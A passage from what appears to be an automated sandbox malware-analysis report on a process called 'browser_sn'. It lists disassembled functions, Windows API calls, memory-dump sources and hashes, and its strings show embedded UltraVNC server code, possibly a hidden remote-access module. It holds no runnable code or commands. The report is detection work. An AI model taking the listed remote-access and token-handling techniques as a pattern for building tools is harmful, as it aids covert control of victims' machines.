                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: freemalloc
                                                                            • String ID: vncencoder.cpp : failed to obtain colour map data!$vncencoder.cpp : generating 8-bit palette data$vncencoder.cpp : generating BGR233 palette data$vncencoder.cpp : remote palette data requested
                                                                            • API String ID: 3061335427-2748099863
                                                                            • Opcode ID: 63f80d4832f6e4566eecb43401796b936a332ff03a4846ba86bc6f35182ff0bb
                                                                            • Instruction ID: 8b2749995479e62a9d7d9170b5f56b3038178b725261e97b5d6b78e69a6567e4
                                                                            • Opcode Fuzzy Hash: 63f80d4832f6e4566eecb43401796b936a332ff03a4846ba86bc6f35182ff0bb
                                                                            • Instruction Fuzzy Hash: B241E062A1869681F7648F20A8417B977A0EF4678EF440032EECC83B9ADEBCE504C740
                                                                            Function 00007FF6C2B942A0 Relevance: 9.1, APIs: 6, Instructions: 101threadwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Thread$CreateFileMessageModuleNamePlayPostResumeSound
                                                                            • String ID:
                                                                            • API String ID: 3945334538-0
                                                                            • Opcode ID: 6ea77f1f998ec3782ac377f9155b0b4839ff24fcf66b865c59a37faa4ce68111
                                                                            • Instruction ID: 2fa1cd62830d485d9d88c737b8e2690acafe4fcef5eb627534a839a1832eb33c
                                                                            • Opcode Fuzzy Hash: 6ea77f1f998ec3782ac377f9155b0b4839ff24fcf66b865c59a37faa4ce68111
                                                                            • Instruction Fuzzy Hash: 8F41C126B18A4181EB50DF25E4402BDA371EBCAB9EF484131DF9D83799DEBCD895C380
                                                                            Function 00007FF6C2C3AA6C Relevance: 9.1, APIs: 6, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno_invalid_parameter_noinfo$_fileno_ftbuf
                                                                            • String ID:
                                                                            • API String ID: 2434734397-0
                                                                            • Opcode ID: fedb473ed8e07211a0b48662a4d4207601b42be0040328777e4ad7852e106941
                                                                            • Instruction ID: 0245f7c59fd2d907b4be7ad1f9dd46e547dea725cc2170967b1e5e2705b94dc8
                                                                            • Opcode Fuzzy Hash: fedb473ed8e07211a0b48662a4d4207601b42be0040328777e4ad7852e106941
                                                                            • Instruction Fuzzy Hash: 2F314661A0864641EAD49F6959502F922A27F41BAEF505B31EFADC73D1CFBCE861C300
                                                                            Function 00007FF6C2B9FFA0 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 81COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • malloc.LIBCMT ref: 00007FF6C2B9FFFD
                                                                              • Part of subcall function 00007FF6C2C38C34: _FF_MSGBANNER.LIBCMT ref: 00007FF6C2C38C64
                                                                              • Part of subcall function 00007FF6C2C38C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF6C2C4329C,?,?,?,00007FF6C2C47749,?,?,?,00007FF6C2C477F3), ref: 00007FF6C2C38C89
                                                                              • Part of subcall function 00007FF6C2C38C34: _callnewh.LIBCMT ref: 00007FF6C2C38CA2
                                                                              • Part of subcall function 00007FF6C2C38C34: _errno.LIBCMT ref: 00007FF6C2C38CAD
                                                                              • Part of subcall function 00007FF6C2C38C34: _errno.LIBCMT ref: 00007FF6C2C38CB8
                                                                            • free.LIBCMT ref: 00007FF6C2BA0097
                                                                              • Part of subcall function 00007FF6C2C38BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C38C0A
                                                                              • Part of subcall function 00007FF6C2C38BF4: _errno.LIBCMT ref: 00007FF6C2C38C14
                                                                              • Part of subcall function 00007FF6C2C38BF4: GetLastError.KERNEL32(?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C38C1C
                                                                            • free.LIBCMT ref: 00007FF6C2BA00BF
                                                                            Strings
                                                                            • This server does not have a valid password enabled. Until a password is set, incoming connections cannot be accepted., xrefs: 00007FF6C2BA0068
                                                                            • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF6C2B9FFE0
                                                                            • vncclient.cpp : no password specified for server - client rejected, xrefs: 00007FF6C2BA0053
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
                                                                            • String ID: This server does not have a valid password enabled. Until a password is set, incoming connections cannot be accepted.$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$vncclient.cpp : no password specified for server - client rejected
                                                                            • API String ID: 1063416079-3080451256
                                                                            • Opcode ID: 7436aef3344165f661bf3289f4a794c91dc4c24a9d76a1fefccbb8194f0ba96d
                                                                            • Instruction ID: 1ab6f4149edff883b8c203050c01ea21dd94a9615d9a698508126907fb76dbcd
                                                                            • Opcode Fuzzy Hash: 7436aef3344165f661bf3289f4a794c91dc4c24a9d76a1fefccbb8194f0ba96d
                                                                            • Instruction Fuzzy Hash: 2C31832161868281EB50DF25E8512BA6361FF85BBDF545732EEBEC77D5DEACD4018300
                                                                            Function 00007FF6C2C17C90 Relevance: 9.1, APIs: 6, Instructions: 64synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$Leave$EnterErrorExceptionLastObjectRaiseSingleValueWait
                                                                            • String ID:
                                                                            • API String ID: 824239979-0
                                                                            • Opcode ID: 12bf6ecd7088038fd47cecf56f3922a6986b1dec9d24cf819874f6182f192e8f
                                                                            • Instruction ID: d5a5e178a1c7a0a5f16581ebe2d656ff9bfdcd4037d29d97e1cd2420ae1d1ca5
                                                                            • Opcode Fuzzy Hash: 12bf6ecd7088038fd47cecf56f3922a6986b1dec9d24cf819874f6182f192e8f
                                                                            • Instruction Fuzzy Hash: 8E218222A28A4692EBC1DF21E44517A7370FB94B8AF445032EF8E83795DFBCD489C740
                                                                            Function 00007FF6C2B91C10 Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleToken$OpenProcess$CreateDuplicateFirstInformationProcess32SnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 3355884492-0
                                                                            • Opcode ID: 6104325d5a1b9d43be635a96be43e70745f11669b1d82cc91958b0e9663c2412
                                                                            • Instruction ID: 35dcb763e789bd1253c510f30485433a0c4db4a0d6c873634f6e411b6f49d0f9
                                                                            • Opcode Fuzzy Hash: 6104325d5a1b9d43be635a96be43e70745f11669b1d82cc91958b0e9663c2412
                                                                            • Instruction Fuzzy Hash: D7218D25A1868282E750AF29F44422AA7B0BF997DEF004135DFDD83B65CFBCD445E740
                                                                            Function 00007FF6C2C399D8 Relevance: 9.0, APIs: 6, Instructions: 37COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno_fileno_flush_freebuf_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 3613856401-0
                                                                            • Opcode ID: 22e8c468e637d92c8e7f14c6622d0db4cac7223b0f4977f25baec7dc4bd546e1
                                                                            • Instruction ID: 9681c74eed1b9d6bc404fdd7cfa84c8ff6ac312f7381998d07f9c43d338779d2
                                                                            • Opcode Fuzzy Hash: 22e8c468e637d92c8e7f14c6622d0db4cac7223b0f4977f25baec7dc4bd546e1
                                                                            • Instruction Fuzzy Hash: 8A012C12E5864241FA94AE6698513F911A06F9576EF290B30EFA9C73C2CEBCE8418340
                                                                            Function 00007FF6C2C437C4 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6C2C3FFD1,?,?,?,?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C437CE
                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF6C2C3FFD1,?,?,?,?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C437DC
                                                                            • SetLastError.KERNEL32(?,?,?,00007FF6C2C3FFD1,?,?,?,?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C43834
                                                                              • Part of subcall function 00007FF6C2C432EC: Sleep.KERNEL32(?,?,?,00007FF6C2C437F7,?,?,?,00007FF6C2C3FFD1,?,?,?,?,00007FF6C2C38C19), ref: 00007FF6C2C43331
                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6C2C3FFD1,?,?,?,?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C43808
                                                                            • free.LIBCMT ref: 00007FF6C2C4382B
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00007FF6C2C4381C
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                            • String ID:
                                                                            • API String ID: 3106088686-0
                                                                            • Opcode ID: 5f2b5b5caa0b08d9e115ab91103603327581cb969fb76fc374ee9c9b2b7431f5
                                                                            • Instruction ID: 76f6a12bc87ca692e646b66b8a3f0056fca99993ac5d6846380076168b52b687
                                                                            • Opcode Fuzzy Hash: 5f2b5b5caa0b08d9e115ab91103603327581cb969fb76fc374ee9c9b2b7431f5
                                                                            • Instruction Fuzzy Hash: 33017124A0974382FAC4AF75E44407972B1BF8879AB188A35CFAE873D5DF7CE405C610
                                                                            Function 00007FF6C2B90310 Relevance: 9.0, APIs: 6, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                                            • String ID:
                                                                            • API String ID: 2426525106-0
                                                                            • Opcode ID: 3d019ec6239ca241c2487075fcffbc8e2330726c6abefad2d031d43e165b0baa
                                                                            • Instruction ID: 4f77f12bad52132619cd386fe663d98cf49e0b44bcaae04e3dbdaa522b39d7dc
                                                                            • Opcode Fuzzy Hash: 3d019ec6239ca241c2487075fcffbc8e2330726c6abefad2d031d43e165b0baa
                                                                            • Instruction Fuzzy Hash: 5701FF22618A4296DB84DF16E9901B87334FF88B89B404531DF8DC3761CFA9E5B5C300
                                                                            Function 00007FF6C2B90390 Relevance: 9.0, APIs: 6, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                                            • String ID:
                                                                            • API String ID: 2426525106-0
                                                                            • Opcode ID: 519421b3b674e42368a913bd218afa9024c234a5df41dca482dc94a54fba9521
                                                                            • Instruction ID: 76ecf42921962d50dfee69aa704be8f296310ea9ac4a8eff5472476b98105841
                                                                            • Opcode Fuzzy Hash: 519421b3b674e42368a913bd218afa9024c234a5df41dca482dc94a54fba9521
                                                                            • Instruction Fuzzy Hash: 72F06766A58A4285EB80DF25DC910B87334FF88F4EB404571CE8DC7365CFA9D955C350
                                                                            Function 00007FF6C2B9DD20 Relevance: 9.0, APIs: 6, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                                            • String ID:
                                                                            • API String ID: 2426525106-0
                                                                            • Opcode ID: ed0781dc8889168bce117aea87ed44a54f9bb397e4d36f2ca679cd736364b467
                                                                            • Instruction ID: 76ecf42921962d50dfee69aa704be8f296310ea9ac4a8eff5472476b98105841
                                                                            • Opcode Fuzzy Hash: ed0781dc8889168bce117aea87ed44a54f9bb397e4d36f2ca679cd736364b467
                                                                            • Instruction Fuzzy Hash: 72F06766A58A4285EB80DF25DC910B87334FF88F4EB404571CE8DC7365CFA9D955C350
                                                                            Function 00007FF6C2BAB810 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 255fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • vncclient.cpp : Compress returned error in File Send :%d, xrefs: 00007FF6C2BABA26
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$Leave$EnterFileRead
                                                                            • String ID: vncclient.cpp : Compress returned error in File Send :%d
                                                                            • API String ID: 3826087893-1161645139
                                                                            • Opcode ID: a901618a62c2e900ccc2fab75a1467ef20a867966cfe858518b3aa7bba12f5c0
                                                                            • Instruction ID: b15c9a6e761fcc27f5a39c17955112edc1b6cc626f208735d8132b23350e8bc5
                                                                            • Opcode Fuzzy Hash: a901618a62c2e900ccc2fab75a1467ef20a867966cfe858518b3aa7bba12f5c0
